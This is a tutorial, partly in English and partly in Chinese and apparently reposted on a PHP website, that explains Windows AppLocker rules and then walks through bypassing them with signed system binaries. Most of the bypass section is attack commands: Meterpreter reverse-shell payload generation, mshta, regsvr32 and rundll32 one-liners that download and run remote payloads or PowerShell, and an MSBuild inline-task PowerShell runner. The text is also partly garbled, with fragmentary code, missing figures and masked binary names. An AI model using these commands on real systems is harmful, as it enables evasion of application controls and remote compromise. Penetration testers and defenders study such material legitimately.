How to perform AppLocker bypass analysis

Preface

What is applocker<br>

AppLocker, the "Application Control Policy", is a newly added security feature in the Windows 7 system. This function is integrated by default in systems above win7. We can enable Application Identity in services, and then find the Applocker option in Application Control Policies in local security policy.

applocker rules<br>

The default Applocker rules support the following:

Rules** | Associated file formats---|--- executable files | .exe, .com scripts | .ps1, .bat, .cmd, .vbs, .js Windows Installer files | .msi, .msp, .mst packaged applications and packaged application installers | .appx DLL files | .dll, .ocx

.appx does not exist in all applockers. It should be determined according to the windows version. On win10, after creating the applocker rule, the corresponding .applocker file will be generated in C:\Windows\System32\AppLocker.

applocker rule conditions<br>

Rule conditions are criteria used to help AppLocker identify the apps to which the rule applies. The three main rule conditions are publisher, path, and file hash.

• Publisher: Identifies it based on the application's digital signature<br>

• Path: Through the application's location in the computer's file system or on the network location to identify it<br>

• # File Hash: Represents the system-computed cryptographic hash of the identified file<br>

AppLocker Default Rules<br>

After you create an applocker rule, the system will ask you by default whether to add a default rule, as shown in the figure below:

The default rules corresponding to each rule are as follows:

The executable default rule types include:

• Allow the local Administrators group Members of run all applications. <br>

• Allow members of the Everyone group to run apps in Windows folders. <br>

• #Allow members of the Everyone group to run apps in the Program Files folder. <br>

Script default rule types include:

• Allow members of the local Administrators group to run all scripts. <br>

• Allow members of the Everyone group to run scripts in the Program Files folder. <br>

• Allow members of the Everyone group to run scripts in Windows folders. <br>

Windows Installer Default rule types include:

• Allow members of the local Administrators group to run all Windows Installer files. <br>

• #Allow members of the Everyone group to run all digitally signed Windows Installer files. <br>

• Allow members of the Everyone group to run all Windows Installer files in the Windows\Installer folder. <br>

DLL Default rule type:

• Allow members of the local Administrators group to run all DLLs. <br>

• Allow members of the Everyone group to run DLLs in the Program Files folder. <br>

• Allow members of the Everyone group to run DLLs in the Windows folder. <br>

Wrapped application default rule type:

• Allow members of the Everyone group to install and run all signed packaged and packaged applications Installer<br>

AppLocker Rule Behavior<br>

Rules can be configured to use allow or deny actions:

• allow. You can specify which files are allowed to run in your environment and for which users or groups of users. You can also configure exceptions to identify files that are excluded from the rule. <br>

• reject. You can specify files that are not allowed to run in your environment and the users or groups for which they are targeted. You can also configure exceptions to identify files that are excluded from the rule. <br>

Create an applocker rule<br>

Having said so much, we have banned running exe on the desktop file as an example to create a rule. The creation is roughly as follows:

Run the exe test:

The system will prevent us from running

bypass Applocker<br>

Installutil.exe<br>

InstallUtil is part of the .NET Framework and is a command line program that allows users to quickly install through the command prompt and uninstall the application. Since this utility is a Microsoft-signed binary, it can be used to bypass AppLocker restrictions to run any .NET executable. The utility is also located inside the Windows folder, which does not apply AppLocker policies since the contents of the Windows folder need to be executed for the system to function properly.

First we use WhiteListEvasion (https://github.com/khr0x40sh/WhiteListEvasion) to generate a template

<br>

<br>

python InstallUtil.py --cs_file pentestlab.cs --exe_file /root/Desktop/pentestlab.exe --payload windows/meterpreter/reverse_https --lhost 192.168.0.103 --lport 443

The above command will generate a C# template that will contain the Metasploit ShellCode.

Put the generated file into the target and execute it using the following method:

<br>

<br>

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= / LogToConsole=false /U /root/payload.exe

Of course, you can also use msf to generate a csharp payload, then replace the shellcode in the template, and then transfer the cs file to the target machine.

Then compile our script with csc:

<br>

<br>

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:exeshell.exe exeshell.cs

At this point we try to execute our file:

is intercepted by the rule, then we use

<br>

<br>

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

Bypass

msf went online successfully

In msf, there is also a bypass module using InstallUtil.exe for applocker.

<br>

<br>

exploit/windows/local/applocker_bypass

The principle is the same

##With common paths:

• C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe

  <br>

##C:\Windows\Microsoft.NET\Framework64\ v2.0.50727\InstallUtil.exe

• <br>

#C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

• <br>

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

• <br>

Msbuild.exe

<br> MSBuild.exe (Microsoft Build Engine) is the software building platform used by Visual Studio. It takes XML-formatted project files that define the requirements for building for various platforms and configurations. (Quote: MSDN MSBuild)

We can use MSBuild to proxy code execution through a trusted Windows utility. The MSBuild inline tasks feature introduced in .NET version 4 allows C# code to be inserted into XML project files. Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when used in this way, it can execute arbitrary code and bypass application whitelisting protections configured to allow MSBuild.exe execution.

We directly use GreatSCT to generate an xml file here.

<br>

<br>

./GreatSCT.py --ip 192.168.0.106 --port 4444 -t bypass -p msbuild/meterpreter/rev_tcp.py

and An rc file will be generated for us. We can use msfconsole -r to start msf directly

and then use msbuild to execute it.

msf goes online:

Of course you can also use msf to generate a c# shellcode and then load it using the template of Sanhao student master:

https://github.com/3gstudent/msbuild- inline-task/blob/master/executes shellcode.xml

Note that the suffix name is changed to .csproj

In addition to rebounding the shell, we can also use it to bypass the restrictions of powershell.

code show as below:

<br>

<br>

                             ");                        string x = Console.ReadLine();                        try                        {                            Console.WriteLine(RunPSCommand(x));                        }                        catch (Exception e)                        {                            Console.WriteLine(e.Message);                        }                    }                                return true;                }               //Based on Jared Atkinson's And Justin Warner's Work                public static string RunPSCommand(string cmd)                {                    //Init stuff                    Runspace runspace = RunspaceFactory.CreateRunspace();                    runspace.Open();                    RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);                    Pipeline pipeline = runspace.CreatePipeline();                    //Add commands                    pipeline.Commands.AddScript(cmd);                    //Prep PS for string output and invoke                    pipeline.Commands.Add("Out-String");                    Collection<psobject> results = pipeline.Invoke();                    runspace.Close();                    //Convert records to strings                    StringBuilder stringBuilder = new StringBuilder();                    foreach (PSObject obj in results)                    {                        stringBuilder.Append(obj);                    }                    return stringBuilder.ToString().Trim();                 }                 public static void RunPSFile(string script)                {                    PowerShell ps = PowerShell.Create();                    ps.AddScript(script).Invoke();                }            }        ]]>  </psobject>  

原地址：https://github.com/3gstudent/msbuild-inline-task/blob/master/executes PowerShellCommands.xml

成功绕过对powershell的限制。

常见路径如下：

• C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe<br>

• C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe<br>

• C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe<br>

• C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe<br>

• C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe<br>

• C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe<br>

Mshta.exe<br>

mshta.exe是微软Windows操作系统相关程序，英文全称Microsoft HTML Application，可翻译为微软超文本标记语言应用，用于执行.HTA文件。默认已集成在环境变量中。

使用Mshta的方式有很多，我们这里使用msf的exploit/windows/misc/hta_server模块进行测试：

<br>

<br>

use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit

目标机执行：

<br>

<br>

mshta.exe http://192.168.0.106:8080/JR1gb3TO6.hta

即可上线。

除了这种方法hta还可以使用cobaltstrike 、Setoolkit、Magic unicorn、Empire、CactusTorch、Koadic、Great SCT等进行上线。

除了本地文件，mshta还支持远程下载的方式执行payload，比如：

<br>

<br>

mshta.exe javascript:a=GetObject("script:https://gist.github.com/someone/something.sct").Exec();close();

除了以上的方式，mshta可以用用来执行powershell：

<br>

<br>

Even if applocker has prohibited powershell execution

InfDefaultInstall.exe<br>

InfDefaultInstall.exe is a The tool used for inf installation has Microsoft signature and the path is:

• C:\Windows\System32\Infdefaultinstall.exe<br>

• C:\Windows\SysWOW64\Infdefaultinstall.exe<br>

We can also use it to bypass some restrictions. The usage is to directly follow the file with your inf file.

Its execution process is as follows:

The POC address given by the author is as follows:

https://gist.github.com /KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a

The idea is the same as in the picture, using shady.inf to call the remote sct backdoor.

But his call requires higher permissions. The screenshot I ran under win10:

Mavinject.exe<br>

Mavinject is a windows component that comes with win10. We can use it to inject dll and bypass some restrictions.

Usage is as follows:

<br>

<br>

mavinject32.exe

Common paths are as follows:

• C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe<br>

• C:\Windows\System32\mavinject.exe<br>

• C:\Windows\SysWOW64\mavinject.exe<br>

But when I reproduced it locally, the injection was not successful, but there was no prompt. I don’t know the specific reason. The version is: 10.0.15063.0 (WinBuild.160101.0800)

should be able to be successfully injected. Attached is a picture of the successful Twitter boss.

If you are interested, you can try a few more systems.

MSIEXEC<br>

MSIEXEC is a Microsoft application that can be used to install or configure products from the command line. This is actually not very unfamiliar. I have written articles about using it to escalate privileges before. We assume that the msi file can be executed and used to bypass applocker's restrictions on powershell.

First use msf to generate an msi file.

<br>

<br>

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi

Execute under windows:

Successfully bypassed.

msxsl.exe<br>

msxsl.exe is an xml converter with a Microsoft digital signature. The download address is as follows:

https://www.microsoft.com/en-us/download/details.aspx?id=21714

We use 3gstudent tries to bypass applocker’s calc restriction,

customers.xml:

<br>

<br>

John Smith

123 Elm St.

(123) 456-7890 Mary Jones

456 Oak Ave.

(156) 789-0123

script.xml:

<br>

<br>

成功绕过：

当然也可以执行我们的shellcode，具体参考：

https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml

Regsv***.exe<br>

regsv***是Windows命令行实用程序，用于将.dll文件和ActiveX控件注册和注销到注册表中。

文件位置：

• C:\Windows\System32\regsv***.exe<br>

• C:\Windows\SysWOW64\regsv***.exe<br>

下面为大家演示，绕过applocker上线。

scT文件内容如下：

<br>

<br>

各参数的含义：

• 静默不显示任何消息// / s<br>

• 不调用DLL注册服务器// / n<br>

• 要使用另一个IP地址，因为它不会调用DLL注册服务器// / i<br>

• 使用取消注册方法// / u<br>

除了本地执行，它还支持远程加载：

<br>

<br>

regsv*** /u /n /s /i:http://ip:port/payload.sct scrobj.dll

sct我们使用ＧreatSct生成即可。

Rundll32.exe<br>

Rundll32是一个Microsoft二进制文件，可以执行DLL文件中的代码。由于此实用程序是Windows操作系统的一部分，因此可以用作绕过AppLocker规则或软件限制策略的方法

先生成我们的payload：

目标机执行： 　 　

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
document.write();
new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

<br>

上线：

除了远程之外，也可以本地上线：

rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll

<br>

也可以用来绕过对某些软件的限制，比如弹个cmd：

The above is the detailed content of How to perform AppLocker bypass analysis. For more information, please follow other related articles on the PHP Chinese website!